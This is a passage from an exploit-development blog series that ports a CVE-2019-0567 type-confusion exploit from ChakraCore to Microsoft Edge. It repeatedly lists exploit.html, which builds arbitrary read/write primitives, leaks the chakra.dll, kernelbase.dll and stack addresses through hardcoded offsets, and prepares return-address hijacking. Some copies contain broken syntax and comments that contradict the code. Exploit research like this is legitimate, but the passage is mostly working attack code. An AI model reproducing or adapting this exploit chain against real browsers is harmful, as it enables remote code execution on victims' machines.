Nothing about this code differs in the slightest from our previous exploit.js code, except for the fact we are now using an HTML, as obviously this is the type of file Edge expects as it’s a web browser. This also means that we have replaced print() functions with proper document.write() HTML methods in order to print our exploit output to the screen. We have also added a <script></script> tag to allow us to execute our malicious JavaScript in the browser. Additionally, we added functionality in the <button onclick="main()">Click me to exploit CVE-2019-0567!</button> line, where our exploit won’t be executed as soon as the web page is opened. Instead, this button allows us choose when we want to detonate our exploit. This will aid us in debugging as we will see shortly.

Once we have saved exploit.html, we can double-click on it and select Microsoft Edge as the application we want to open it with. From there, we should be presented with our Click me to exploit CVE-2019-0567 button.

After we have loaded the web page, we can then click on the button to run the code presented above for exploit.html.

As we can see, everything works as expected (per our post number two in this blog series) and we leak the vftable from one of our DataView objects, from our exploit primitive, which is a pointer into chakra.dll. However, as we are exploiting Edge itself now and not the ChakraCore engine, computation of the base address of chakra.dll will be slightly different. To do this, we need to debug Microsoft Edge in order to compute the distance between our leaked address and chakra.dll’s base address. With that said, we will need to talk about debugging Edge in order to compute the base address of chakra.dll.

We will begin by making use of Process Hacker to aid in our debugging. After downloading Process Hacker, we can go ahead and start it.

After starting Process Hacker, let’s go ahead and re-open exploit.html but do not click on the Click me to exploit CVE-2019-0567 button yet.

Coming back to Process Hacker, we can see two MicrosoftEdgeCP.exe processes and a MicrosoftEdge.exe process.

Where do these various processes come from? As the CP in MicrosoftEdgeCP.exe infers, these are Microsoft Edge content processes. A content process, also known as a renderer process, is the actual component of the browser which executes the JavaScript, HTML, and CSS code a user interfaces with. In this case, we can see two MicrosoftEdgeCP.exe processes. One of these processes refers to the actual content we are seeing (the actual exploit.html web page). The other MicrosoftEdgeCP.exe process is technically not a content process, per se, and is actually the out-of-process JIT server which we talked about previously in this blog series. What does this actually mean?

JIT’d code is code that is generated as readable, writable, and executable (RWX). This is also known as β€œdynamic code” which is generated at runtime, and it doesn’t exist when the Microsoft Edge processes are spawned. We will talk about Arbitrary Code Guard (ACG) in a bit, but at a high level ACG prohibits any dynamic code (amongst other nuances we will speak of at the appropriate time) from being generated which is readable, writable, and executable (RWX). Since ACG is a mitigation, which was actually developed with browser exploitation and Edge in mind, there is a slight usability issue. Since JIT’d code is a massive component of a modern day browser, this automatically makes ACG incompatible with Edge. If ACG is enabled, then how can JIT’d code be generated, as it is RWX? The solution to this problem is by leveraging an out-of-process JIT server (located in the second MicrosoftEdgeCP.exe process).

This JIT server process has Arbitrary Code Guard disabled. The reason for this is because the JIT process doesn’t handle any execution of β€œuntrusted” JavaScript code - meaning the JIT server can’t really be exploited by browser exploitation-related primitives, like a type confusion vulnerability (we will prove this assumption false with our ACG bypass). The reason is that since the JIT process doesn’t execute any of that JavaScript, HTML, or CSS code, meaning we can infer the JIT server doesn’t handled any β€œuntrusted code”, a.k.a JavaScript provided by a given web page, we can infer that any code running within the JIT server is β€œtrusted” code and therefore we don’t need to place β€œunnecessary constraints” on the process. With the out-of-process JIT server having no ACG-enablement, this means the JIT server process is now compatible with β€œJIT” and can generate the needed RWX code that JIT requires. The main issue, however, is how do we get this code (which is currently in a separate process) into the appropriate content process where it will actually be executed?

The way this works is that the out-of-process JIT server will actually take any JIT’d code that needs to be executed, and it will inject it into the content processes that contain the JavaScript code to be executed with proper permissions that are ACG complaint (generally readable/executable). So, at a high level, this out-of-process JIT server performs process injection to map the JIT’d code into the content processes (which has ACG enabled). This allows the Edge content processes, which are responsible for handling untrusted code like a web page that hosts malicious JavaScript to perform memory corruption (e.g. exploit.html), to have full ACG support.

Lastly, we have the MicrosoftEdge.exe process which is known as the browser process. It is the β€œmain” process which helps to manage things like network requests and file access.

Armed with the above information, let’s now turn our attention back to Process Hacker.

The obvious point we can make is that when we do our exploit debugging, we know the content process is responsible for execution of the JavaScript code within our web page - meaning that it is the process we need to debug as it will be responsible for execution of our exploit. However, since the out-of-process JIT server is technically named as a content process, this makes for two instances of MicrosoftEdgeCP.exe. How do we know which is the out-of-process JIT server and which is the actual content process? This probably isn’t the best way to tell, but the way I figured this out with approximately 100% accuracy is by looking at the two content processes (MicrosoftEdgeCP.exe) and determining which one uses up more RAM. In my testing, the process which uses up more RAM is the target process for debugging (as it is significantly more, and makes sense as the content process has to load JavaScript, HTML, and CSS code into memory for execution). With that in mind, we can break down the process tree as such (based on the Process Hacker image above):

  1. MicrosoftEdge.exe - PID 3740 (browser process)
  2. MicrosoftEdgeCP.exe - PID 2668 (out-of-process JIT server)
  3. MicrosoftEdgeCP.exe - PID 2512 (content process - our β€œexploiting process” we want to debug).

With the aforementioned knowledge we can attach PID 2512 (our content process, which will likely differ on your machine) to WinDbg and know that this is the process responsible for execution of our JavaScript code. More importantly, this process loads the Chakra JavaScript engine DLL, chakra.dll.

After confirming chakra.dll is loaded into the process space, we then can click out Click me to exploit CVE-2019-0567 button (you may have to click it twice). This will run our exploit, and from here we can calculate the distance to chakra.dll in order to compute the base of chakra.dll.

As we can see above, the leaked vftable pointer is 0x5d0bf8 bytes away from chakra.dll. We can then update our exploit script to the following code, and confirm this to be the case.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

After computing the base address of chakra.dll the next thing we need to do is, as shown in part two, leak an import address table (IAT) entry that points to kernel32.dll (in this case kernelbase.dll, which contains all of the functionality of kernel32.dll).

Using the same debugging session, or a new one if you prefer (following the aforementioned steps to locate the content process), we can locate the IAT for chakra.dll with the !dh command.

If we dive a bit deeper into the IAT, we can see there are several pointers to kernelbase.dll, which contains many of the important APIs such as VirtualProtect we need to bypass DEP and ACG. Specifically, for our exploit, we will go ahead and extract the pointer to kernelbase!DuplicateHandle as our kernelbase.dll leak, as we will need this API in the future for our ACG bypass.

What this means is that we can use our read primitive to read what chakra_base+0x5ee2b8 points to (which is a pointer into kernelbase.dll). We then can compute the base address of kernelbase.dll by subtracting the offset to DuplicateHandle from the base of kernelbase.dll in the debugger.

We now know that DuplicateHandle is 0x18de0 bytes away from kernelbase.dll’s base address. Armed with the following information, we can update exploit.html as follows and detonate it.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));

We are now almost done porting our exploit primitives to Edge from ChakraCore. As we can recall from our ChakraCore exploit, the last thing we need to do now is leak a stack address/the stack in order to bypass CFG for control-flow hijacking and code execution.

Recall that this information derives from this Google Project Zero issue. As we can recall with our ChakraCore exploit, we computed these offsets in WinDbg and determined that ChakraCore leveraged slightly different offsets. However, since we are now targeting Edge, we can update the offsets to those mentioned by Ivan Fratric in this issue.

However, even though the type->scriptContext->threadContext offsets will be the ones mentioned in the Project Zero issue, the stack address offset is slightly different. We will go ahead and debug this with alert() statements.

We know we have to leak a type pointer (which we already have stored in exploit.html the same way as part two of this blog series) in order to leak a stack address. Let’s update our exploit.html with a few items to aid in our debugging for leaking a stack address.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));

    // ---------------------------------------------------------------------------------------------

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));

    // Spawn an alert dialogue to pause execution

As we can see, we have added a document.write() call to print out the address of our type pointer (from which we will leak a stack address) and then we also added an alert() call to create an β€œalert” dialogue. Since JavaScript will use temporary virtual memory (e.g. memory that isn’t really backed by disk in the form of a 0x7fff address that is backed by a loaded DLL) for objects, this address is only β€œconsistent” for the duration of the process. Think of this in terms of ASLR - when, on Windows, you reboot the system, you can expect images to be loaded at different addresses. This is synonymous with the longevity of the address/address space used for JavaScript objects, except that it is on a β€œper-script basis” and not a per-boot basis (β€œper-script” basis is a made-up word by myself to represent the fact the address of a JavaScript object will change after each time the JavaScript code is ran). This is the reason we have the document.write() call and alert() call. The document.write() call will give us the address of our type object, and the alert() dialogue will actually work, in essence, like a breakpoint in that it will pause execution of JavaScript, HTML, or CSS code until the β€œalert” dialogue has been dealt with. In other words, the JavaScript code cannot be fully executed until the dialogue is dealt with, meaning all of the JavaScript code is loaded into the content process and cannot be released until it is dealt with. This will allow us examine the type pointer before it goes out of scope, and so we can examine it. We will use this same β€œsetup” (e.g. alert() calls) to our advantage in debugging in the future.

If we run our exploit two separate times, we can confirm our theory about the type pointer changing addresses each time the JavaScript executes

Now, for β€œreal” this time, let’s open up exploit.html in Edge and click the Click me to exploit CVE-2019-0567 button. This should bring up our β€œalert” dialogue.

As we can see, the type pointer is located at 0x1ca40d69100 (note you won’t be able to use copy and paste with the dialogue available, so you will have to manually type this value). Now that we know the address of the type pointer, we can use Process Hacker to locate our content process.

As we can see, the content process which uses the most RAM is PID 6464. This is our content process, where our exploit is currently executing (although paused). We now can use WinDbg to attach to the process and examine the memory contents of 0x1ca40d69100.

After inspecting the memory contents, we can confirm that this is a valid address - meaning our type pointer hasn’t gone out of scope! Although a bit of an arduous process, this is how we can successfully debug Edge for our exploit development!

Using the Project Zero issue as a guide, and leveraging the process outlined in part two of this blog series, we can talk various pointers within this structure to fetch a stack address!

The Google Project Zero issue explains that we essentially can just walk the type pointer to extract a ScriptContext structure which, in turn, contains ThreadContext. The ThreadContext structure is responsible, as we have seen, for storing various stack addresses. Here are the offsets:

  1. type + 0x8 = JavaScriptLibrary
  2. JavaScriptLibrary + 0x430 = ScriptContext
  3. ScriptContext + 0x5c0 = ThreadContext

In our case, the ThreadContext structure is located at 0x1ca3d72a000.

Previously, we leaked the stackLimitForCurrentThread member of ThreadContext, which gave us essentially the stack limit for the exploiting thread. However, take a look at this address within Edge (located at ThreadContext + 0x4f0)

If we try to examine the memory contents of this address, we can see they are not committed to memory. This obviously means this address doesn’t fall within the bounds of the TEB’s known stack address(es) for our current thread.

As we can recall from part two, this was also the case. However, in ChakraCore, we could compute the offset from the leaked stackLimitForCurrentThread consistently between exploit attempts. Let’s compute the distance from our leaked stackLimitForCurrentThread with the actual stack limit from the TEB.

Here, at this point in the exploit, the leaked stack address is 0x1cf0000 bytes away from the actual stack limit we leaked via the TEB. Let’s exit out of WinDbg and re-run our exploit, while also leaking our stack address within WinDbg.

Our type pointer is located at 0x157acb19100.

After attaching Edge to WinDbg and walking the type object, we can see our leaked stack address via stackLimitForCurrentThread.

As we can see above, when computing the offset, our offset has changed to being 0x1c90000 bytes away from the actual stack limit. This poses a problem for us, as we cannot reliable compute the offset to the stack limit. Since the stack limit saved in the ThreadContext structure (stackForCurrentThreadLimit) is not committed to memory, we will actually get an access violation when attempting to dereference this memory. This means our exploit would be killed, meaning we also can’t β€œguess” the offset if we want our exploit to be reliable.

Before I pose the solution, I wanted to touch on something I first tried. Within the ThreadContext structure, there is a global variable named globalListFirst. This seems to be a linked-list within a ThreadContext structure which is used to track other instances of a ThreadContext structure. At an offset of 0x10 within this list (consistently, I found, in every attempt I made) there is actually a pointer to the heap.

Since it is possible via stackLimitForCurrentThread to at least leak an address around the current stack limit (with the upper 32-bits being the same across all stack addresses), and although there is a degree of variance between the offset from stackLimitForCurrentThread and the actual current stack limit (around 0x1cX0000 bytes as we saw between our two stack leak attempts), I used my knowledge of the heap to do the following:

  1. Leak the heap from chakra!ThreadContext::globalListFirst
  2. Using the read primitive, scan the heap for any stack addresses that are greater than the leaked stack address from stackLimitForCurrentThread

I found that about 50-60% of the time I could reliably leak a stack address from the heap. From there, about 50% of the time the stack address that was leaked from the heap was committed to memory. However, there was a varying degree of β€œfailing” - meaning I would often get an access violation on the leaked stack address from the heap. Although I was only succeeding in about half of the exploit attempts, this is significantly greater than trying to β€œguess” the offset from the stackLimitForCurrenThread. However, after I got frustrated with this, I saw there was a much easier approach.

The reason why I didn’t take this approach earlier, is because the stackLimitForCurrentThread seemed to be from a thread stack which was no longer in memory. This can be seen below.

Looking at the above image, we can see only one active thread has a stack address that is anywhere near stackLimitForCurrentThread. However, if we look at the TEB for the single thread, the stack address we are leaking doesn’t fall anywhere within that range. This was disheartening for me, as I assumed any stack address I leaked from this ThreadContext structure was from a thread which was no longer active and, thus, its stack address space being decommitted. However, in the Google Project Zero issue - stackLimitForCurrentThread wasn’t the item leaked, it was leafInterpreterFrame. Since I had enjoyed success with stackLimitForCurrentThread in part two of this blog series, it didn’t cross my mind until much later to investigate this specific member.

If we take a look at the ThreadContext structure, we can see that at offset 0x8f0 that there is a stack address.

In fact, we can see two stack addresses. Both of them are committed to memory, as well!

If we compare this to Ivan’s findings in the Project Zero issue, we can see that he leaks two stack addresses at offset 0x8a0 and 0x8a8, just like we have leaked them at 0x8f0 and 0x8f8. We can therefore infer that these are the same stack addresses from the leafInterpreter member of ThreadContext, and that we are likely on a different version of Windows that Ivan, which likely means a different version of Edge and, thus, the slight difference in offset. For our exploit, you can choose either of these addresses. I opted for ThreadContext + 0x8f8.

Additionally, if we look at the address itself (0x1c2affaf60), we can see that this address doesn’t reside within the current thread.

However, we can clearly see that not only is this thread committed to memory, it is within the known bounds of another thread’s TEB tracking of the stack (note that the below diagram is confusing because the columns are unaligned. We are outlining the stack base and limit).

This means we can reliably locate a stack address for a currently executing thread! It is perfectly okay if we end up hijacking a return address within another thread because as we have the ability to read/write anywhere within the process space, and because the level of β€œprivate” address space Windows uses is on a per-process basis, we can still hijack any thread from the current process. In essence, it is perfectly valid to corrupt a return address on another thread to gain code execution. The β€œlower level details” are abstracted away from us when it comes to this concept, because regardless of what return address we overwrite, or when the thread terminates, it will have to return control-flow somewhere in memory. Since threads are constantly executing functions, we know that at some point the thread we are dealing with will receive priority for execution and the return address will be executed. If this makes no sense, do not worry. Our concept hasn’t changed in terms of overwriting a return address (be it in the current thread or another thread). We are not changing anything, from a foundational perspective, in terms of our stack leak and return address corruption between this blog post and part two of this blog series.

With that being said, here is how our exploit now looks with our stack leak.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));

After running our exploit, we can see that we have successfully leaked a stack address.

From our experimenting earlier, the offsets between the leaked stack addresses have a certain degree of variance between script runs. Because of this, there is no way for us to compute the base and limit of the stack with our leaked address, as the offset is set to change. Because of this, we will forgo the process of computing the stack limit. Instead, we will perform our stack scanning for return addresses from the address we have currently leaked. Let’s recall a previous image outlining the stack limit of the thread where we leaked a stack address at the time of the leak.

As we can see, we are towards the base of the stack. Since the stack grows β€œdownwards”, as we can see with the stack base being located at a higher address than the actual stack limit, we will do our scanning in β€œreverse” order, in comparison to part two. For our purposes, we will do stack scanning by starting at our leaked stack address and traversing backwards towards the stack limit (which is the highest, technically β€œlowest” address the stack can grow towards).

We already outlined in part two of this blog post the methodology I used in terms of leaking a return address to corrupt. As mentioned then, the process is as follows:

  1. Traverse the stack using read primitive
  2. Print out all contents of the stack that are possible to read
  3. Look for anything starting with 0x7fff, meaning an address from a loaded module like chakra.dll
  4. Disassemble the address to see if it is an actual return address

While omitting much of the code from our full exploit, a stack scan would look like this (a scan used just to print out return addresses):


// Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
